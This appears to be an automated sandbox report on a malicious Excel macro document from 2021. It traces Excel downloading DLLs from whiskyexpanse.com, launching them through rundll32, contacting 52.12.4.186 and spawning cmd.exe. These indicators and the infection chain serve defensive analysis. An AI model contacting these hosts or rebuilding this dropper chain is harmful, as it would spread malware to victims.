Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 4_2_6E7C190C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 4_2_6E8067AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___crtGetLocaleInfoEx, 4_2_6E7D3576
Source: C:\Windows\SysWOW64\rundll32.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 4_2_6E806537
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E779516 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 4_2_6E779516
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E802845 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 4_2_6E802845
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Behavior Graph (ID 383422; sample Documents_460000622_1464906353.xls; start date 07/04/2021; architecture WINDOWS; score 100)

Signatures attached to the sample node: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Document exploit detected (drops PE files); Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros); 5 other signatures

Process tree recovered from the graph:

EXCEL.EXE (started; graph counts: 90 created registry values, 46 created files)
    network: whiskyexpanse.com 104.21.3.47:443 (local port 49167), CLOUDFLARENETUS, United States
    dropped: C:\Users\user\ndgfht.frg (PE32)
    dropped: C:\Users\user\AppData\Local\...\ohior[1].dll (PE32)
    signatures: Document exploit detected (creates forbidden files); Document exploit detected (UrlDownloadToFile)
    -> rundll32.exe (started)
        -> rundll32.exe (started; graph count: 12)
            network: 52.12.4.186:443 (local ports 49170, 49172), AMAZON-02US, United States
            signature: System process connects to network (likely due to code injection or exploit)
            -> cmd.exe (started)

Contacted Public IPs

IP            Domain             Country        ASN    ASN Name         Malicious
52.12.4.186   unknown            United States  16509  AMAZON-02US      true
104.21.3.47   whiskyexpanse.com  United States  13335  CLOUDFLARENETUS  false

Contacted Domains

Name               IP           Active
whiskyexpanse.com  104.21.3.47  true